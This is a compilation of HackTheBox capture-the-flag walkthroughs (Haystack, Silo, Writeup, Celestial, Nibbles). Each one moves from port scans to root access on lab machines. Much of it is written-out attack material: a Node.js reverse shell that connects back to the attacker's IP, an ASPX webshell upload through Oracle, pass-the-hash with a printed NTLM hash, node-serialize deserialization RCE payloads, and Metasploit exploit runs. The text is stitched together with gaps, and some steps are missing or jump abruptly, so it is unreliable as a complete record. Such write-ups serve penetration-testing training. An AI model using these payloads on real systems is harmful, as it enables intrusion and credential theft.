HackTheBox is a website that hosts a collection of vulnerable machines inside its own VPN.
To learn new techniques, the goal is to solve all of the machines (or as many as possible).
This is a walkthrough of the box “Haystack”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.115 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-04 15:42 EET
Nmap scan report for 10.10.10.115
Host is up (0.047s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
| 256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_ 256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp open http nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open http nginx 1.12.2
| http-methods:
|_ Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json;charset=UTF-8).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.51 seconds
HTTP enumeration:
It looks like there is only one page, showing a haystack image.
We find base64-encoded data there.
Decoding it gives a message in an unfamiliar language.
root@kali:~# echo 'bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==' | base64 -d
la aguja en el pajar es "clave"
Google is always our friend. Translate the message.
la aguja en el pajar es "clave"
->
the needle in the haystack is "key"
Then, go back to Elasticsearch on port 9200.
Elasticsearch is a search engine based on the Lucene library. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents.
To query Elasticsearch over its HTTP API, we pass the search term in the “q” parameter.
root@kali:~# curl http://10.10.10.115:9200/_search?q=clave
{"took":136,"timed_out":false,"_shards":{"total":11,"successful":11,"skipped":0,"failed":0},"hits":{"total":2,"max_score":5.9335938,"hits":[{"_index":"quotes","_type":"quote","_id":"45","_score":5.9335938,"_source":{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}},{"_index":"quotes","_type":"quote","_id":"111","_score":5.3459888,"_source":{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}}]}}
Kibana listens on “127.0.0.1:5601” on the box, so to reach it from our machine we need port forwarding.
Kibana is the data visualization UI used with Elasticsearch.
By clicking the “Management” tab, we can see that the Kibana version is “6.4.2”.
A quick search shows that this version of Kibana has an LFI vulnerability, “CVE-2018-17246”.
As described there, upload the following JavaScript reverse shell to “/dev/shm”.
shell.js:
(function () {
  var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []);
  var client = new net.Socket();
  client.connect(443, "10.10.14.13", function () {
    client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client);
  });
  return /a/; // Prevents the Node.js application from crashing
})();
Then launch a netcat listener and send the GET request that makes Kibana load “shell.js”.
We get a reverse shell as the user “kibana”.
After a few minutes we can finally confirm that a new user “firefart” with password “test” has been added to “/etc/passwd”.
To switch to that user, use the “su” command.
[security@haystack ~]$ su firefart
Password:
[root@haystack security]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
This is a walkthrough of the box “Silo”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.82 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-06 15:58 EET
Nmap scan report for 10.10.10.82
Host is up (0.047s latency).
Not shown: 65520 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49160/tcp open oracle-tns Oracle TNS listener (requires service name)
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2m19s, deviation: 0s, median: 2m18s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-11-06T14:51:29
|_ start_date: 2019-11-06T14:00:27
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3066.66 seconds
There is nothing interesting on port 80 (HTTP).
So we take a look at the Oracle TNS listener instead.
First, try to enumerate SIDs.
The Oracle System ID (SID) uniquely identifies a particular database on a system; for this reason, a system cannot have two databases with the same SID.
msf5 auxiliary(admin/oracle/sid_brute) > use auxiliary/admin/oracle/sid_brute
msf5 auxiliary(admin/oracle/sid_brute) > set rhost 10.10.10.82
rhost => 10.10.10.82
msf5 auxiliary(admin/oracle/sid_brute) > show options
Module options (auxiliary/admin/oracle/sid_brute):
   Name     Current Setting                                          Required  Description
   ----     ---------------                                          --------  -----------
   RHOSTS   10.10.10.82                                              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    1521                                                     yes       The target port (TCP)
   SIDFILE  /usr/share/metasploit-framework/data/wordlists/sid.txt   no        The file that contains a list of sids.
   SLEEP    1                                                        no        Sleep() amount between each request.
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 10.10.10.82
[*] 10.10.10.82:1521 - Starting brute force on 10.10.10.82, using sids from /usr/share/metasploit-framework/data/wordlists/sid.txt...
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'XE'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'PLSExtProc'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'CLRExtProc'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID ''
[*] 10.10.10.82:1521 - Done with brute force...
[*] Auxiliary module execution completed
Next, try some default credentials.
The list can be found in the Oracle Database Installation Guide.
This time the following credential worked:
scott:tiger
root@kali:/opt/oracle/instantclient_19_3# ./sqlplus SCOTT/tiger@10.10.10.82:1521/XE
SQL*Plus: Release 19.0.0.0.0 - Production on Wed Nov 6 18:24:53 2019
Version 19.3.0.0.0
Copyright (c) 1982, 2019, Oracle. All rights reserved.
ERROR:
ORA-28002: the password will expire within 7 days
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL>
For Oracle penetration testing we can use ODAT (“odat.py”).
It is not installed by default, so install it with “apt-get”:
apt-get install odat
Then upload an ASPX webshell; one is shipped with Kali Linux by default.
To upload a file, use ODAT's “dbmsadvisor” module with the --putFile option.
root@kali:~# odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\\inetpub\\wwwroot cmdasp.aspx /usr/share/webshells/aspx/cmdasp.aspx
[1] (10.10.10.82:1521): Put the /usr/share/webshells/aspx/cmdasp.aspx local file in the C:\inetpub\wwwroot path (named cmdasp.aspx) of the 10.10.10.82 server
[+] The /usr/share/webshells/aspx/cmdasp.aspx local file was put in the remote C:\inetpub\wwwroot path (named cmdasp.aspx)
Launch a netcat listener to receive a reverse shell.
Now we have a reverse shell.
user.txt is in the directory “C:\users\Phineas\Desktop”.
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.82] 49174
cwd
PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> type C:\users\Phineas\Desktop\user.txt
92ede778a1cc8d27cb6623055c331617
3. Getting Root
There is another file in the same directory, “Oracle issue.txt”, which contains a password.
PS C:\users\Phineas\Desktop> dir
    Directory: C:\users\Phineas\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a---          1/5/2018  10:56 PM            300 Oracle issue.txt
-a---          1/4/2018   9:41 PM             32 user.txt
PS C:\users\Phineas\Desktop> type "Oracle issue.txt"
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
?%Hm8646uC$
Then try to access the Dropbox link.
However, the password as displayed above does not work. Reading the same file through the webshell we uploaded shows the correct password:
£%Hm8646uC$
With it, download the file “SILO-20180105-221806.zip”.
Unzipping it gives a file containing a memory dump.
We can investigate it with Volatility, which is installed by default.
First, determine the profile of “SILO-20180105-221806.dmp”.
Since Windows allows pass-the-hash, the Administrator hash recovered from the dump is enough:
we can get a SYSTEM shell with the Metasploit psexec module.
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set smbuser Administrator
smbuser => Administrator
msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7
smbpass => aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7
msf5 exploit(windows/smb/psexec) > set rhost 10.10.10.82
rhost => 10.10.10.82
msf5 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.10.14.13:4444
[*] 10.10.10.82:445 - Connecting to the server...
[*] 10.10.10.82:445 - Authenticating to 10.10.10.82:445 as user 'Administrator'...
[*] 10.10.10.82:445 - Selecting PowerShell target
[*] 10.10.10.82:445 - Executing the payload...
[+] 10.10.10.82:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (180291 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.82:49175) at 2019-11-06 19:24:15 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
As always, root.txt is in the directory “C:\Users\Administrator\Desktop”.
meterpreter > shell
Process 1884 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>type C:\users\administrator\desktop\root.txt
type C:\users\administrator\desktop\root.txt
cd39ea0af657a495e33bc59c7836faf6
C:\Windows\system32>
This is a walkthrough of the box “Writeup”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.138 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 15:17 EEST
Nmap scan report for 10.10.10.138
Host is up (0.039s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
| 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.42 seconds
It seems we cannot use gobuster on this box.
First, take a look at the web page.
There is nothing there. Next, look at the path listed in robots.txt (“/writeup/”).
We find a web page that runs “CMS Made Simple”.
On the CMS Made Simple download page there is a link that lets us browse the content of the package.
In its “/trunk/doc” directory there is a “CHANGELOG.txt”.
Requesting the same “CHANGELOG.txt” on Writeup shows that the installed version of CMS Made Simple is “2.2.9.1”.
root@kali:~# curl http://10.10.10.138/writeup/doc/CHANGELOG.txt
Version 2.2.9.1
-------------------------------
Core - General
- fix to the CmsLayoutStylesheetQuery class
- fix an edge case in the Database\Connection::DbTimeStamp() method
MicroTiny v2.2.4
- Minor fix in error displays.
Phar Installer v1.3.7
- Fix to edge case in step 3 where memory_limit is set to -1
Version 2.2.9 - Blow Me Down
~~~
Logging in over SSH, we get a user shell as “jkr”.
root@kali:~# ssh jkr@10.10.10.138
jkr@10.10.10.138's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
After that, launch a netcat listener and log in to Writeup over SSH as jkr again.
We get a reverse shell as root.
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.138] 50656
bash: cannot set terminal process group (2460): Inappropriate ioctl for device
bash: no job control in this shell
root@writeup:/# id
id
uid=0(root) gid=0(root) groups=0(root)
This is a walkthrough of the box “Celestial”.
Completion: 49th / 131 boxes
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.85 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 11:46 EEST
Nmap scan report for 10.10.10.85
Host is up (0.039s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2743.74 seconds
We find some parameters in the cookie.
So we fuzz this Node.js web app by sending special values in the cookie.
If we send “+” as the value of “num”, we get a syntax error back.
This means the value of “num” is not treated as a string but ends up as an argument to eval() or something similar.
More precisely, the cookie is deserialized on the web server.
Googling for “nodejs serialization exploit” leads to the blog post Exploiting Node.js deserialization bug for Remote Code Execution.
According to that post, to build the payload for RCE we need the following Node.js code and run it.
root@kali:~# cat buildRCE.js
var y = {
  rce: function() {
    require('child_process').exec('uname -a', function(error, stdout, stderr) { console.log(stdout) });
  },
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));
However, this payload didn't work for me.
The article Deserialization Vulnerabilities: Attacking Deserialization in JS explains that during deserialization, anything after the special tag “_$$ND_FUNC$$_” goes directly to eval().
This means the “function()” wrapper is not needed; a payload of the following form is enough:
{"anything_here":"_$$ND_FUNC$$_console.log(1)"}
We can check that the payload works by writing the following script and running it locally.
Remove the “function(){\n” prefix and the trailing “\n}” from the serialized output
(and don't forget to escape each single quote with a backslash, i.e. \').
root@kali:~# cat serialize.js
var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_require(\'child_process\').exec(\'uname -a\', function(error, stdout, stderr){ console.log(stdout)})"}';
serialize.unserialize(payload);
root@kali:~# node serialize.js
Linux kali 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-6kali1 (2019-07-22) x86_64 GNU/Linux
Combining the previous findings gives us the final payload.
We also need a reverse-shell command that uses neither single quotes nor double quotes,
so the two parts have to be merged.
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.85] 56418
/bin/sh: 0: can't access tty; job control turned off
$ whoami
sun
user.txt is in the directory “/home/sun/Documents”.
In syslog we can see that a root cron job runs “/home/sun/Documents/script.py” every 5 minutes.
$ tail syslog
Oct 5 02:05:46 sun gnome-session[3685]: at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)
Oct 5 02:05:46 sun gnome-session[3685]: at next (/home/sun/node_modules/express/lib/router/route.js:137:13)
Oct 5 02:05:46 sun gnome-session[3685]: at Route.dispatch (/home/sun/node_modules/express/lib/router/route.js:112:3)
Oct 5 02:05:46 sun gnome-session[3685]: at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)
Oct 5 02:05:46 sun gnome-session[3685]: at /home/sun/node_modules/express/lib/router/index.js:281:22
Oct 5 02:05:46 sun gnome-session[3685]: at Function.process_params (/home/sun/node_modules/express/lib/router/index.js:335:12)
Oct 5 02:05:46 sun gnome-session[3685]: at next (/home/sun/node_modules/express/lib/router/index.js:275:10)
Oct 5 02:05:46 sun gnome-session[3685]: at cookieParser (/home/sun/node_modules/cookie-parser/index.js:70:5)
Oct 5 02:05:46 sun gnome-session[3685]: at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)
Oct 5 02:10:01 sun CRON[8246]: (root) CMD (python /home/sun/Documents/script.py > /home/sun/output.txt;cp /root/script.py /home/sun/Documents/script.py;chown sun:sun /home/sun/Documents/script.py; chattr -i /home/sun/Documents/script.py;touch -d "$(date -R -r /home/sun/Documents/user.txt)" /home/sun/Documents/script.py)
Since we have write permission on “/home/sun/Documents/script.py”, we can take advantage of that.
A short Python reverse shell can be found on Pentestmonkey's reverse shell cheat sheet.
Make sure the listener for the reverse shell is running.
When the cron job fires, we get a reverse shell as root.
root@kali:~# nc -nlvp 8080
listening on [any] 8080 ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.85] 48518
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
This is a walkthrough of the box “Nibbles”.
Completion: 48th / 131 boxes
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.75 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-29 09:43 EEST
Nmap scan report for 10.10.10.75
Host is up (0.039s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.33 seconds
2. Getting User
The only interesting port is 80 (HTTP), and at first sight there is nothing there.
Running curl against the page, we find an interesting comment in its source.
There is a Metasploit module that gives RCE.
However, it needs credentials, which we have to guess.
This time the username is the default one and the password is the server name:
admin:nibbles
Then run the exploit with the following procedure.
msf5 > search nibble
Matching Modules
================
   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability
msf5 > use exploit/multi/http/nibbleblog_file_upload
msf5 exploit(multi/http/nibbleblog_file_upload) > set rhost 10.10.10.75
rhost => 10.10.10.75
msf5 exploit(multi/http/nibbleblog_file_upload) > set username admin
username => admin
msf5 exploit(multi/http/nibbleblog_file_upload) > set password nibbles
password => nibbles
msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi /nibbleblog
targeturi => /nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload) > run
[*] Started reverse TCP handler on 10.10.14.30:4444
[*] Sending stage (38247 bytes) to 10.10.10.75
[*] Meterpreter session 1 opened (10.10.14.30:4444 -> 10.10.10.75:37036) at 2019-09-29 11:25:40 +0300
[+] Deleted image.php
meterpreter > getuid
Server username: nibbler (1001)
Now we have a Meterpreter session.
user.txt is in the directory “/home/nibbler”.
To do more enumeration, upgrade the Meterpreter session to a full shell as follows.
meterpreter > shell
Process 1716 created.
Channel 1 created.
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
nibbler@Nibbles:/home/nibbler$
Running “sudo -l” shows that nibbler can run “/home/nibbler/personal/stuff/monitor.sh” via sudo as root without a password.
nibbler@Nibbles:/home/nibbler$ sudo -l
sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
Then create the file “/home/nibbler/personal/stuff/monitor.sh” with content that spawns a root shell.
Finally, execute “monitor.sh” with sudo. It takes a bit of time, but we get a root shell.
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh
sudo ./monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
sudo: unable to resolve host Nibbles: Connection timed out
root@Nibbles:/home/nibbler/personal/stuff# id
id
uid=0(root) gid=0(root) groups=0(root)